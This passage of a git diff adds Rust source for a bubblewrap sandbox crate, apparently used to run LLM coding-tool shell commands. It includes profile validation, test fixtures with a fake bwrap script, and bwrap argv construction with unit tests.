+ pub fn clear_env(&self) -> bool { + self.clear_env + } + + /// Returns the default environment variables as a slice. + pub fn default_env(&self) -> &[EnvVar] { + &self.default_env + } + + /// Returns the extra environment variables as a slice. + pub fn extra_env(&self) -> &[EnvVar] { + &self.extra_env + } + + /// Returns the availability state. + pub fn availability(&self) -> &Availability { + &self.availability + } + + pub(crate) fn bwrap_program(&self) -> &Path { + self.bwrap_program.as_ref() + } + + pub(crate) fn shell(&self) -> &Path { + &self.shell + } + + pub(crate) fn static_args(&self) -> &[OsString] { + &self.static_args + } + + /// Translates a host working directory to the corresponding path inside the + /// sandbox. + /// + /// Returns [`Cow::Borrowed`] when the path is returned unchanged; + /// [`Cow::Owned`] only when a bind-mount prefix had to be rewritten. + /// + /// # Errors + /// + /// Returns [`LinuxBwrapError::InvalidPath`] when `workdir` is a host path + /// that the sandbox does not expose (not under any mounted prefix). 
+ #[inline] + pub(crate) fn map_workdir_to_sandbox<'a>( + &'a self, + workdir: Option<&'a Path>, + ) -> Result, LinuxBwrapError> { + let Some(dir) = workdir else { + return Ok(Cow::Borrowed(self.workspace_dest())); + }; + + if let Some(mapping) = self.sandbox_layout().classify(dir) { + return Ok(match mapping { + PathMapping::SamePath => Cow::Borrowed(dir), + PathMapping::Remap { + dest_prefix, + relative, + } => join_mapped_path(dest_prefix, relative), + }); + } + + Err(LinuxBwrapError::InvalidPath(format!( + "working directory is not visible inside the linux sandbox: {}", + dir.display() + ))) + } + + fn sandbox_layout(&self) -> SandboxLayout<'_> { + SandboxLayout { + workspace: self.workspace(), + workspace_dest: self.workspace_dest(), + synthetic_home: self.synthetic_home(), + synthetic_home_dest: self.synthetic_home_dest(), + cache_root: self.cache_root(), + mount_cache_root: self.mount_cache_root(), + tmp_backing: self.tmp_backing(), + read_only_host_rootfs: self.read_only_host_rootfs(), + tmpfs_overlays: self.tmpfs_overlays(), + file_overlays: self.file_overlays(), + read_only_mounts: self.read_only_mounts(), + read_write_mounts: self.read_write_mounts(), + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + use std::borrow::Cow; + use std::ffi::OsString; + + fn profile_with_workspace_dest(workspace_dest: &str) -> Profile { + Profile { + preset: None, + workspace: Box::from(Path::new("/host/workspace")), + workspace_dest: Box::from(Path::new(workspace_dest)), + synthetic_home: Box::from(Path::new("/host/home")), + synthetic_home_dest: Box::from(Path::new("/sandbox/home")), + cache_root: Box::from(Path::new("/cache")), + tmp_backing: TmpBacking::Tmpfs, + mount_cache_root: true, + compat_symlinks: Arc::new([]), + read_only_mounts: Arc::new([]), + read_write_mounts: Arc::new([]), + tmpfs_overlays: Arc::new([]), + file_overlays: Arc::new([]), + credential_file_mounts: Arc::new([]), + read_only_host_rootfs: false, + network_policy: NetworkPolicy::Disabled, + 
clear_env: false, + default_env: Arc::new([]), + extra_env: Arc::new([]), + availability: Availability::Unknown, + bwrap_program: Arc::from(Box::from(Path::new("/usr/bin/bwrap"))), + shell: Box::from(Path::new("/bin/sh")), + static_args: Arc::<[OsString]>::from([]), + } + } + + #[test] + fn map_workdir_to_sandbox_borrows_when_path_is_unchanged() { + let dir = Path::new("/host/workspace/subdir"); + let profile = profile_with_workspace_dest("/host/workspace"); + + match profile.map_workdir_to_sandbox(Some(dir)).unwrap() { + Cow::Borrowed(mapped) => assert_eq!(mapped, dir), + Cow::Owned(mapped) => panic!("expected borrowed path, got {}", mapped.display()), + } + } + + #[test] + fn map_workdir_to_sandbox_allocates_only_for_rewritten_prefixes() { + let dir = Path::new("/host/workspace/subdir"); + let profile = profile_with_workspace_dest("/workspace"); + + match profile.map_workdir_to_sandbox(Some(dir)).unwrap() { + Cow::Borrowed(mapped) => panic!("expected owned path, got {}", mapped.display()), + Cow::Owned(mapped) => assert_eq!(mapped, Path::new("/workspace/subdir")), + } + } +} diff --git a/src/llm-coding-tools-bubblewrap/src/profile/validation.rs b/src/llm-coding-tools-bubblewrap/src/profile/validation.rs new file mode 100644 index 00000000..eb51d265 --- /dev/null +++ b/src/llm-coding-tools-bubblewrap/src/profile/validation.rs @@ -0,0 +1,217 @@ +//! Shared validation helpers for bubblewrap profiles. +//! +//! Path, symlink, environment variable, and backing-store checks used +//! during profile construction. +//! +//! # Validation +//! +//! Every validator returns [`Result<(), LinuxBwrapError>`] with +//! [`LinuxBwrapError::InvalidPath`] on failure. Validators are designed +//! to be called early and fail fast before a profile is assembled. +//! +//! # Public API +//! +//! - **Directory & path checks**: [`validate_absolute_path`], +//! [`validate_directory_path`], [`validate_optional_directory_path`], +//! [`validate_existing_path`], [`validate_mount_paths`] +//! 
- **Overlay checks**: [`validate_tmpfs_overlays`], [`validate_file_overlays`] +//! - **Symlink checks**: [`validate_symlinks`] +//! - **Environment variable checks**: [`validate_env_vars`] +//! - **Tmp backing checks**: [`validate_tmp_backing`] +//! - **Cache setup**: [`ensure_cache_root_subdirs`] + +use super::types::{EnvVar, FileOverlay, Symlink, TmpBacking}; +use crate::LinuxBwrapError; +use std::fs; +use std::path::Path; + +/// Creates `xdg-cache` and `xdg-state` subdirectories under `cache_root`. +/// +/// No-op when `mount_cache_root` is false. +/// +/// # Errors +/// +/// Returns [`LinuxBwrapError::InvalidPath`] if `cache_root` is not absolute +/// or a subdirectory cannot be created. +pub(crate) fn ensure_cache_root_subdirs( + mount_cache_root: bool, + cache_root: &Path, +) -> Result<(), LinuxBwrapError> { + if !mount_cache_root { + return Ok(()); + } + + validate_absolute_path(cache_root, "cache root host path")?; + for subdir in ["xdg-cache", "xdg-state"] { + let path = cache_root.join(subdir); + fs::create_dir_all(&path).map_err(|err| { + LinuxBwrapError::InvalidPath(format!( + "failed to create cache root subdir {}: {err}", + path.display() + )) + })?; + } + Ok(()) +} + +/// Validates that `path` is absolute. +pub(crate) fn validate_absolute_path(path: &Path, label: &str) -> Result<(), LinuxBwrapError> { + if path.is_absolute() { + Ok(()) + } else { + Err(LinuxBwrapError::InvalidPath(format!( + "{label} must be an absolute path: {}", + path.display() + ))) + } +} + +/// Validates that an optional directory path is absolute, exists, and is a directory. +pub(crate) fn validate_optional_directory_path( + path: Option<&Path>, + label: &str, +) -> Result<(), LinuxBwrapError> { + match path { + Some(path) => validate_directory_path(path, label), + None => Ok(()), + } +} + +/// Validates that `path` is an absolute existing directory. 
+pub(crate) fn validate_directory_path(path: &Path, label: &str) -> Result<(), LinuxBwrapError> { + validate_absolute_path(path, label)?; + let metadata = fs::metadata(path).map_err(|_| { + LinuxBwrapError::InvalidPath(format!("{label} does not exist: {}", path.display())) + })?; + if metadata.is_dir() { + Ok(()) + } else { + Err(LinuxBwrapError::InvalidPath(format!( + "{label} is not a directory: {}", + path.display() + ))) + } +} + +/// Validates that `path` is an absolute existing path. +pub(crate) fn validate_existing_path(path: &Path, label: &str) -> Result<(), LinuxBwrapError> { + validate_absolute_path(path, label)?; + fs::metadata(path).map_err(|_| { + LinuxBwrapError::InvalidPath(format!("{label} does not exist: {}", path.display())) + })?; + Ok(()) +} + +/// Validates mount source paths. +pub(crate) fn validate_mount_paths( + mounts: &[Box], + label: &str, +) -> Result<(), LinuxBwrapError> { + for mount in mounts { + validate_existing_path(mount, label)?; + } + Ok(()) +} + +/// Validates tmpfs overlay destinations. +pub(crate) fn validate_tmpfs_overlays(overlays: &[Box]) -> Result<(), LinuxBwrapError> { + for overlay in overlays { + validate_absolute_path(overlay, "tmpfs overlay path")?; + } + Ok(()) +} + +/// Validates file overlay entries. +/// +/// The source must be an absolute path that exists on the host. The destination +/// must be an absolute path. +pub(crate) fn validate_file_overlays(overlays: &[FileOverlay]) -> Result<(), LinuxBwrapError> { + for overlay in overlays { + validate_existing_path(overlay.source(), "file overlay source")?; + validate_absolute_path(overlay.dest(), "file overlay destination")?; + } + Ok(()) +} + +/// Checks that every symlink has a non-empty target and an absolute link path. +/// +/// # Errors +/// +/// Returns [`LinuxBwrapError::InvalidPath`] for empty targets or non-absolute +/// link paths. 
+pub(crate) fn validate_symlinks(symlinks: &[Symlink]) -> Result<(), LinuxBwrapError> { + for symlink in symlinks { + if symlink.target().is_empty() { + return Err(LinuxBwrapError::InvalidPath(format!( + "compat symlink target must not be empty: {}", + symlink.link_path().display() + ))); + } + validate_absolute_path(symlink.link_path(), "compat symlink path")?; + } + Ok(()) +} + +/// Checks that variable names are non-empty, contain no `=`, and neither +/// names nor values contain NUL bytes. +/// +/// NUL bytes are rejected because environment variables are stored as C strings +/// in the kernel's `environ` array - a NUL would silently truncate the string +/// at that point. +/// +/// # Errors +/// +/// Returns [`LinuxBwrapError::InvalidPath`] for the first invalid variable found. +pub(crate) fn validate_env_vars(vars: &[EnvVar], label: &str) -> Result<(), LinuxBwrapError> { + for var in vars { + if var.name().is_empty() { + return Err(LinuxBwrapError::InvalidPath(format!( + "{label} environment variable name must not be empty" + ))); + } + if var.name().contains('=') { + return Err(LinuxBwrapError::InvalidPath(format!( + "{label} environment variable name must not contain '=': {}", + var.name() + ))); + } + if var.name().contains('\0') { + return Err(LinuxBwrapError::InvalidPath(format!( + "{label} environment variable name must not contain NUL: {}", + var.name() + ))); + } + if var.value().contains('\0') { + return Err(LinuxBwrapError::InvalidPath(format!( + "{label} environment variable value must not contain NUL: {}", + var.name() + ))); + } + } + Ok(()) +} + +/// Validates that bind-backed `/tmp` targets an existing directory other than +/// the host `/tmp` itself. [`TmpBacking::Tmpfs`] always passes. +/// +/// # Errors +/// +/// Returns [`LinuxBwrapError::InvalidPath`] if the host directory does not +/// exist, is not a directory, or is exactly `/tmp`. 
+pub(crate) fn validate_tmp_backing(tmp_backing: &TmpBacking) -> Result<(), LinuxBwrapError> { + match tmp_backing { + TmpBacking::Tmpfs => Ok(()), + TmpBacking::BindHost(host_dir) => { + validate_directory_path(host_dir, "sandbox tmp host directory")?; + if host_dir.as_ref() == Path::new("/tmp") { + return Err(LinuxBwrapError::InvalidPath( + "sandbox tmp host directory must not be /tmp; \ + use a dedicated directory to avoid sharing state \ + with the host and other sandboxes" + .to_string(), + )); + } + Ok(()) + } + } +} diff --git a/src/llm-coding-tools-bubblewrap/src/test_helpers.rs b/src/llm-coding-tools-bubblewrap/src/test_helpers.rs new file mode 100644 index 00000000..6fbcc78c --- /dev/null +++ b/src/llm-coding-tools-bubblewrap/src/test_helpers.rs @@ -0,0 +1,320 @@ +//! Shared test helpers for bubblewrap unit tests. +//! +//! Provides environment isolation ([`PathGuard`], `replace_path`, `prepend_path`), +//! fake binary scaffolding (`create_fake_bwrap`, `create_fake_shell`), and +//! reusable sandbox fixtures ([`SandboxDirs`], [`SandboxFixture`]) that set up +//! temp directory layouts and managed `PATH` overrides. + +use crate::probe::PROBE_ARG0; +use crate::{LinuxBwrapError, Profile, TmpBacking}; +use std::env; +use std::ffi::OsString; +use std::fs; +use std::path::{Path, PathBuf}; +use tempfile::TempDir; + +const DEFAULT_FAKE_SHELL: &str = "#!/bin/sh\nexit 0\n"; + +/// Captures the original `PATH` and restores it on drop. +/// +/// Used alongside [`replace_path`] or [`prepend_path`] so that test +/// environment changes are automatically cleaned up. +pub(crate) struct PathGuard(Option); + +impl PathGuard { + /// Snapshots the current `PATH` value (or notes that it is unset). + pub(crate) fn capture() -> Self { + Self(env::var_os("PATH")) + } +} + +impl Drop for PathGuard { + /// Restores the `PATH` that was active when this guard was created. 
+ /// + /// Uses `unsafe` `env::set_var` / `env::remove_var` because Rust's safe + /// API does not permit modifying environment variables during program + /// execution. This is safe in test-only code where single-threaded + /// environment access is guaranteed. + fn drop(&mut self) { + match &self.0 { + Some(path) => unsafe { env::set_var("PATH", path) }, + None => unsafe { env::remove_var("PATH") }, + } + } +} + +/// Replaces `PATH` with `path` and returns a [`PathGuard`] that restores it. +/// +/// # Safety +/// The returned guard restores `PATH` via `unsafe` env-var APIs on drop. +/// Callers must ensure no other thread reads `PATH` concurrently. +pub(crate) fn replace_path(path: &Path) -> PathGuard { + let guard = PathGuard::capture(); + unsafe { env::set_var("PATH", path) }; + guard +} + +/// Prepends `path` to `PATH` and returns a [`PathGuard`] that restores it. +/// +/// If the current `PATH` is empty or unset, the result is just `path`. +/// +/// # Safety +/// The returned guard restores `PATH` via `unsafe` env-var APIs on drop. +/// Callers must ensure no other thread reads `PATH` concurrently. +pub(crate) fn prepend_path(path: &Path) -> PathGuard { + let guard = PathGuard::capture(); + let prefix = path.to_string_lossy(); + let original = guard.0.as_ref().map(|value| value.to_string_lossy()); + let capacity = prefix.len() + original.as_ref().map_or(0, |value| value.len() + 1); + let mut new_path = String::with_capacity(capacity); + new_path.push_str(&prefix); + if let Some(original) = original { + if !original.is_empty() { + new_path.push(':'); + new_path.push_str(&original); + } + } + unsafe { env::set_var("PATH", &new_path) }; + guard +} + +/// Writes `contents` to `path` and marks it executable on Unix. +/// +/// # Panics +/// Propagates any I/O error from the write or permission change. 
+pub(crate) fn write_executable(path: &Path, contents: impl AsRef<[u8]>) { + fs::write(path, contents).unwrap(); + #[cfg(unix)] + { + use std::os::unix::fs::PermissionsExt; + + let mut perms = fs::metadata(path).unwrap().permissions(); + perms.set_mode(0o755); + fs::set_permissions(path, perms).unwrap(); + } +} + +/// Writes an executable script inside `dir` and returns its path. +/// +/// # Panics +/// Propagates any I/O error. +pub(crate) fn write_script(dir: &Path, name: &str, body: &str) -> PathBuf { + let path = dir.join(name); + write_executable(&path, body.as_bytes()); + path +} + +/// Creates a fake `bash` binary that exits successfully. +/// +/// The script is a minimal `/bin/sh` wrapper that returns exit code 0. +pub(crate) fn create_fake_shell(dir: &Path) -> PathBuf { + write_script(dir, "bash", DEFAULT_FAKE_SHELL) +} + +/// Creates a fake `bwrap` script in `dir`. +/// +/// Returns the log file path. The fake binary handles `--version` and the +/// probe command itself, logs other arguments to `bwrap.log`, and then runs +/// `behavior`. +pub(crate) fn create_fake_bwrap(dir: &Path, behavior: &str) -> PathBuf { + let bwrap_path = dir.join("bwrap"); + let log_path = dir.join("bwrap.log"); + let log_path_escaped = log_path.to_string_lossy().replace('\'', "'\\''"); + let script = format!( + r#"#!/bin/sh +# Handle --version probe +for arg in "$@"; do + if [ "$arg" = "--version" ]; then + echo "bubblewrap 0.8.0" + exit 0 + fi +done +# Handle capability probe via the unique shell command marker. 
+for arg in "$@"; do + case "$arg" in + {probe_arg0}) + exit 0 + ;; + esac +done +# Log arguments for verification +for a in "$@"; do + printf '%s\n' "$a" >> '{log_path_escaped}' +done +echo "" >> '{log_path_escaped}' +# Execute the provided behavior +{behavior} +"#, + behavior = behavior, + log_path_escaped = log_path_escaped, + probe_arg0 = PROBE_ARG0, + ); + write_executable(&bwrap_path, script.as_bytes()); + log_path +} + +/// Standard sandbox directory layout used across tests. +/// +/// Owns a [`TempDir`] containing `workspace`, `home`, and `cache` +/// subdirectories. Dropping this value removes the entire tree. +pub(crate) struct SandboxDirs { + temp: TempDir, + workspace: PathBuf, + home: PathBuf, + cache: PathBuf, +} + +impl SandboxDirs { + /// Creates a tempdir with `workspace`, `home`, and `cache` subdirectories. + /// + /// # Panics + /// Propagates any I/O error from tempdir creation or `create_dir_all`. + pub(crate) fn new() -> Self { + let temp = TempDir::new().unwrap(); + let workspace = temp.path().join("workspace"); + let home = temp.path().join("home"); + let cache = temp.path().join("cache"); + fs::create_dir(&workspace).unwrap(); + fs::create_dir(&home).unwrap(); + fs::create_dir(&cache).unwrap(); + Self { + temp, + workspace, + home, + cache, + } + } + + /// Returns the temp root path. + pub(crate) fn temp_path(&self) -> &Path { + self.temp.path() + } + + /// Returns the workspace path. + pub(crate) fn workspace(&self) -> &Path { + &self.workspace + } + + /// Returns the home path. + pub(crate) fn home(&self) -> &Path { + &self.home + } + + /// Returns the cache path. + pub(crate) fn cache(&self) -> &Path { + &self.cache + } + + /// Creates a named directory inside the temp root. + /// + /// # Panics + /// Propagates any I/O error. 
+ pub(crate) fn make_dir(&self, name: &str) -> PathBuf { + let path = self.temp_path().join(name); + fs::create_dir_all(&path).unwrap(); + path + } +} + +/// Shared sandbox fixture with fake binaries and a managed `PATH`. +pub(crate) struct SandboxFixture { + dirs: SandboxDirs, + _path_guard: PathGuard, +} + +impl SandboxFixture { + /// Creates a fixture whose temp root fully replaces `PATH`. + pub(crate) fn new(bwrap_behavior: &str) -> Self { + Self::with_path_mode(bwrap_behavior, false) + } + + /// Creates a fixture whose temp root is prepended to `PATH`. + #[allow(dead_code)] + pub(crate) fn with_prepended_path(bwrap_behavior: &str) -> Self { + Self::with_path_mode(bwrap_behavior, true) + } + + fn with_path_mode(bwrap_behavior: &str, prepend: bool) -> Self { + let dirs = SandboxDirs::new(); + create_fake_bwrap(dirs.temp_path(), bwrap_behavior); + create_fake_shell(dirs.temp_path()); + let _path_guard = if prepend { + prepend_path(dirs.temp_path()) + } else { + replace_path(dirs.temp_path()) + }; + Self { dirs, _path_guard } + } + + /// Returns the temp root path. + pub(crate) fn temp_path(&self) -> &Path { + self.dirs.temp_path() + } + + /// Returns the workspace path. + pub(crate) fn workspace(&self) -> &Path { + self.dirs.workspace() + } + + /// Returns the home path. + pub(crate) fn home(&self) -> &Path { + self.dirs.home() + } + + /// Returns the cache path. + pub(crate) fn cache(&self) -> &Path { + self.dirs.cache() + } + + /// Creates a named directory inside the temp root. + pub(crate) fn make_dir(&self, name: &str) -> PathBuf { + self.dirs.make_dir(name) + } + + /// Overwrites the fake `bash` binary with a custom script. + #[allow(dead_code)] + pub(crate) fn write_shell(&self, body: &str) -> PathBuf { + write_script(self.temp_path(), "bash", body) + } + + /// Overwrites the fake `bwrap` binary with a custom behavior script. 
+ #[allow(dead_code)] + pub(crate) fn write_bwrap(&self, behavior: &str) -> PathBuf { + create_fake_bwrap(self.temp_path(), behavior) + } + + /// Builds the standard public-bot test profile. + /// + /// # Returns + /// `Ok([`Profile`])` on success, or `Err([`LinuxBwrapError`])` if + /// profile construction fails. + pub(crate) fn public_bot_profile(&self) -> Result { + Profile::public_bot_defaults( + self.workspace(), + self.home(), + self.cache(), + Some(TmpBacking::Tmpfs), + ) + } + + /// Builds the standard trusted-maintenance test profile. + /// + /// # Returns + /// `Ok([`Profile`])` on success, or `Err([`LinuxBwrapError`])` if + /// profile construction fails. + pub(crate) fn trusted_maintenance_profile( + &self, + host_tmp: &Path, + ) -> Result { + Profile::trusted_maintenance_defaults(self.workspace(), self.home(), self.cache(), host_tmp) + } +} + +/// Converts command args into owned strings for assertions. +pub(crate) fn args_as_strings<'a>( + args: impl IntoIterator, +) -> Vec { + args.into_iter() + .map(|arg| arg.to_string_lossy().into_owned()) + .collect() +} diff --git a/src/llm-coding-tools-bubblewrap/src/wrap/blocking.rs b/src/llm-coding-tools-bubblewrap/src/wrap/blocking.rs new file mode 100644 index 00000000..c998bb66 --- /dev/null +++ b/src/llm-coding-tools-bubblewrap/src/wrap/blocking.rs @@ -0,0 +1,33 @@ +//! Blocking `process-wrap` integration for bubblewrap execution. +//! +//! # Public API +//! +//! - [`build_command_wrap`] — build the blocking wrapped command + +use super::wrap_command; +use crate::{LinuxBwrapError, Profile}; +use process_wrap::std::{CommandWrap, ProcessGroup}; +use std::path::Path; +use std::process::Stdio; + +/// Builds a sync [`CommandWrap`] from a [`Profile`]. +/// +/// # Errors +/// +/// Returns [`LinuxBwrapError`] on invalid per-command workdir. 
+pub fn build_command_wrap( + profile: &Profile, + command: &str, + workdir: Option<&Path>, +) -> Result { + let wrapped = wrap_command(profile, command, workdir)?; + + let mut wrap = CommandWrap::with_new(wrapped.program(), |cmd| { + cmd.args(wrapped.args()); + cmd.stdin(Stdio::null()) + .stdout(Stdio::piped()) + .stderr(Stdio::piped()); + }); + wrap.wrap(ProcessGroup::leader()); + Ok(wrap) +} diff --git a/src/llm-coding-tools-bubblewrap/src/wrap/command.rs b/src/llm-coding-tools-bubblewrap/src/wrap/command.rs new file mode 100644 index 00000000..17f07ac8 --- /dev/null +++ b/src/llm-coding-tools-bubblewrap/src/wrap/command.rs @@ -0,0 +1,284 @@ +//! Builds `bwrap` command lines from a validated sandbox profile. +//! +//! Given a validated [`crate::profile::Profile`], this module appends the +//! per-invocation working directory and shell command to the precomputed static +//! `bwrap` argv prefix and produces a [`LinuxBwrapWrappedCommand`] ready for +//! execution. + +use crate::profile::validation::validate_optional_directory_path; +use crate::profile::Profile; +use crate::LinuxBwrapError; +use std::borrow::Cow; +use std::ffi::{OsStr, OsString}; +use std::path::Path; + +/// A command wrapped in a `bwrap` sandbox. +/// +/// The wrapped command borrows the profile's static data and the caller's shell +/// command string. The working directory is only allocated when it must be +/// rewritten into a different sandbox path. +#[derive(Debug, Clone, PartialEq, Eq)] +pub struct LinuxBwrapWrappedCommand<'a> { + program: &'a Path, + static_args: &'a [OsString], + sandbox_cwd: Cow<'a, Path>, + shell: &'a Path, + command: &'a str, +} + +impl<'a> LinuxBwrapWrappedCommand<'a> { + /// Returns the `bwrap` executable path. + #[inline] + pub fn program(&self) -> &Path { + self.program + } + + /// Returns the number of argv entries that will be passed to `bwrap`. 
+ #[inline] + pub fn arg_count(&self) -> usize { + self.static_args.len() + 6 + } + + /// Returns the complete argv iterator to pass to `bwrap`. + /// + /// Pass each element to `std::process::Command::args` (or equivalent). + /// The tail is always `--chdir -- -c `. + #[inline] + pub fn args(&self) -> impl Iterator + Clone + '_ { + self.static_args + .iter() + .map(OsString::as_os_str) + .chain(Some(OsStr::new("--chdir"))) + .chain(Some(self.sandbox_cwd.as_os_str())) + .chain(Some(OsStr::new("--"))) + .chain(Some(self.shell.as_os_str())) + .chain(Some(OsStr::new("-c"))) + .chain(Some(OsStr::new(self.command))) + } +} + +#[inline] +fn resolve_sandbox_cwd<'a>( + profile: &'a Profile, + workdir: Option<&'a Path>, +) -> Result, LinuxBwrapError> { + validate_workdir(workdir)?; + profile.map_workdir_to_sandbox(workdir) +} + +/// Builds a `bwrap` command line that runs `command` inside the sandbox +/// described by `profile`. +#[inline] +pub fn wrap_command<'a>( + profile: &'a Profile, + command: &'a str, + workdir: Option<&'a Path>, +) -> Result, LinuxBwrapError> { + Ok(LinuxBwrapWrappedCommand { + program: profile.bwrap_program(), + static_args: profile.static_args(), + sandbox_cwd: resolve_sandbox_cwd(profile, workdir)?, + shell: profile.shell(), + command, + }) +} + +/// Rejects non-absolute or non-existent working directories. 
+fn validate_workdir(workdir: Option<&Path>) -> Result<(), LinuxBwrapError> { + validate_optional_directory_path(workdir, "working directory") +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::test_helpers::{args_as_strings, write_script, SandboxFixture}; + use crate::{Availability, NetworkPolicy, Preset}; + use serial_test::serial; + use std::env; + use std::fs; + use std::path::PathBuf; + use std::sync::Arc; + + #[test] + #[serial] + fn build_command_line_orders_env_mounts_and_cwd() { + let fixture = SandboxFixture::new("exit 0"); + let ro_mount = fixture.make_dir("ro"); + let rw_mount = fixture.make_dir("rw"); + + let default_env: Arc<[crate::EnvVar]> = + Arc::new([crate::EnvVar::new("HOME", "/home/user")]); + let extra_env: Arc<[crate::EnvVar]> = Arc::new([crate::EnvVar::new("FOO", "bar")]); + let ro_mounts: Arc<[Box]> = Arc::new([ + ro_mount.clone().into_boxed_path(), + fixture.temp_path().to_path_buf().into_boxed_path(), + ]); + let rw_mounts: Arc<[Box]> = Arc::new([rw_mount.clone().into_boxed_path()]); + + let profile = crate::Builder::new( + fixture.workspace(), + fixture.home(), + fixture.cache(), + crate::TmpBacking::Tmpfs, + ) + .with_preset(Preset::PublicBot) + .with_clear_env(true) + .with_default_env(default_env) + .with_extra_env(extra_env) + .with_read_only_mounts(ro_mounts) + .with_read_write_mounts(rw_mounts) + .with_network_policy(NetworkPolicy::Disabled) + .with_availability(Availability::Available) + .build() + .unwrap(); + + let cmd_line = wrap_command(&profile, "echo hello", None).unwrap(); + let args = args_as_strings(cmd_line.args()); + + let clearenv_pos = args.iter().position(|a| a == "--clearenv").unwrap(); + let setenv_home_pos = args.iter().position(|a| a == "--setenv").unwrap(); + assert!(clearenv_pos < setenv_home_pos); + assert!(args.contains(&"--unshare-net".to_string())); + let ro_bind_pos = args.iter().position(|a| a == "--ro-bind").unwrap(); + let bind_positions: Vec<_> = args + .iter() + .enumerate() + .filter(|(_, 
a)| *a == "--bind") + .map(|(i, _)| i) + .collect(); + for bind_pos in &bind_positions { + assert!(ro_bind_pos < *bind_pos); + } + + let chdir_pos = args.iter().position(|a| a == "--chdir").unwrap(); + assert_eq!(args[chdir_pos + 1], fixture.workspace().to_string_lossy()); + assert!(args.contains(&"--proc".to_string())); + assert!(args.contains(&"--dev".to_string())); + assert!(args.contains(&"--tmpfs".to_string())); + } + + #[test] + #[serial] + fn build_command_line_uses_workdir_over_workspace() { + let fixture = SandboxFixture::new("exit 0"); + let workdir = fixture.workspace().join("subdir"); + fs::create_dir_all(&workdir).unwrap(); + let profile = fixture.public_bot_profile().unwrap(); + + let cmd_line = wrap_command(&profile, "echo hello", Some(&workdir)).unwrap(); + let args = args_as_strings(cmd_line.args()); + + let chdir_pos = args.iter().position(|a| a == "--chdir").unwrap(); + assert_eq!(args[chdir_pos + 1], "/workspace/subdir"); + } + + #[test] + #[serial] + fn public_bot_defaults_emit_expected_bwrap_argv() { + let fixture = SandboxFixture::new("exit 0"); + let profile = fixture.public_bot_profile().unwrap(); + + let cmd_line = wrap_command(&profile, "echo hello", None).unwrap(); + let args = args_as_strings(cmd_line.args()); + + assert!(args.contains(&"--clearenv".to_string())); + assert!(args.iter().any(|a| a == "--setenv")); + assert!(args.contains(&"PATH".to_string())); + let path_pos = args.iter().position(|a| a == "PATH").unwrap(); + assert!( + args[path_pos + 1].contains("/usr/bin") + || args[path_pos + 1].contains("/run/current-system/sw/bin") + || args[path_pos + 1].contains("/nix/var/nix/profiles/default/bin") + ); + assert!(args.contains(&"HOME".to_string())); + assert!(args.contains(&"/home/sandbox".to_string())); + assert!(args.contains(&"--unshare-net".to_string())); + assert!( + args.contains(&"/usr/bin".to_string()) + || args.contains(&"/run/current-system/sw".to_string()) + || args.contains(&"/nix/store".to_string()) + ); + 
assert!(args.contains(&"--dev".to_string())); + assert!(args.contains(&"--proc".to_string())); + assert!(args.contains(&"--tmpfs".to_string())); + let bind_positions: Vec<_> = args + .iter() + .enumerate() + .filter(|(_, a)| *a == "--bind") + .map(|(i, _)| i) + .collect(); + assert_eq!(bind_positions.len(), 2); + assert!(!args.contains(&fixture.cache().to_string_lossy().to_string())); + let dash_pos = args.iter().position(|a| a == "--").unwrap(); + assert!(Path::new(&args[dash_pos + 1]).is_absolute()); + assert!(args[dash_pos + 1].ends_with("/bash") || args[dash_pos + 1].ends_with("/sh")); + assert_eq!(args[dash_pos + 2], "-c"); + assert_eq!(args[dash_pos + 3], "echo hello"); + } + + #[test] + #[serial] + fn trusted_maintenance_allows_visible_absolute_workdir() { + let fixture = SandboxFixture::new("exit 0"); + let host_tmp = fixture.make_dir("host-tmp"); + let outside = ["/usr/bin", "/usr", "/bin", "/etc", "/var"] + .into_iter() + .map(Path::new) + .find(|path| path.is_dir()) + .expect("expected a visible host directory outside /home and /tmp"); + + let profile = fixture.trusted_maintenance_profile(&host_tmp).unwrap(); + + let cmd_line = wrap_command(&profile, "pwd", Some(outside)).unwrap(); + let args = args_as_strings(cmd_line.args()); + let chdir_pos = args.iter().position(|arg| arg == "--chdir").unwrap(); + assert_eq!(args[chdir_pos + 1], outside.to_string_lossy()); + } + + #[test] + #[serial] + fn explicit_mount_workdir_maps_to_same_path_mount() { + let fixture = SandboxFixture::new("exit 0"); + let ro_mount = fixture.make_dir("shared"); + let nested = ro_mount.join("subdir"); + + fs::create_dir_all(&nested).unwrap(); + + let profile = crate::Builder::new( + fixture.workspace(), + fixture.home(), + fixture.cache(), + crate::TmpBacking::Tmpfs, + ) + .with_read_only_mounts(Arc::from([ + fixture.temp_path().to_path_buf().into_boxed_path(), + ro_mount.clone().into_boxed_path(), + ])) + .build() + .unwrap(); + + let cmd_line = wrap_command(&profile, "pwd", 
Some(nested.as_path())).unwrap(); + let args = args_as_strings(cmd_line.args()); + let chdir_pos = args.iter().position(|arg| arg == "--chdir").unwrap(); + assert_eq!(args[chdir_pos + 1], nested.to_string_lossy()); + } + + #[test] + #[serial] + fn path_changes_after_build_do_not_change_prevalidated_shell() { + let fixture = SandboxFixture::new("exit 0"); + let fake_bin = fixture.make_dir("fake-bin"); + let profile = fixture.public_bot_profile().unwrap(); + + write_script(&fake_bin, "bash", "#!/bin/sh\nexit 0\n"); + unsafe { env::set_var("PATH", &fake_bin) }; + + let cmd_line = wrap_command(&profile, "echo hello", None).unwrap(); + let args = args_as_strings(cmd_line.args()); + let dash_pos = args.iter().position(|arg| arg == "--").unwrap(); + assert_eq!( + PathBuf::from(&args[dash_pos + 1]), + profile.shell().to_path_buf() + ); + } +} diff --git a/src/llm-coding-tools-bubblewrap/src/wrap/mod.rs b/src/llm-coding-tools-bubblewrap/src/wrap/mod.rs new file mode 100644 index 00000000..e16de045 --- /dev/null +++ b/src/llm-coding-tools-bubblewrap/src/wrap/mod.rs @@ -0,0 +1,26 @@ +//! Wraps shell commands inside `bwrap` sandboxes. +//! +//! [`wrap_command`] builds a `bwrap` command from a validated +//! [`crate::profile::Profile`]. +//! The `blocking` and `tokio` submodules adapt it for sync or async execution +//! via `process-wrap`. +//! +//! # Public API +//! +//! - [`wrap_command`] - build the wrapped command +//! - [`LinuxBwrapWrappedCommand`] - program path plus argv iterator +//! +//! # Feature Flags +//! +//! - `blocking` - enables the `blocking` submodule (sync) +//! 
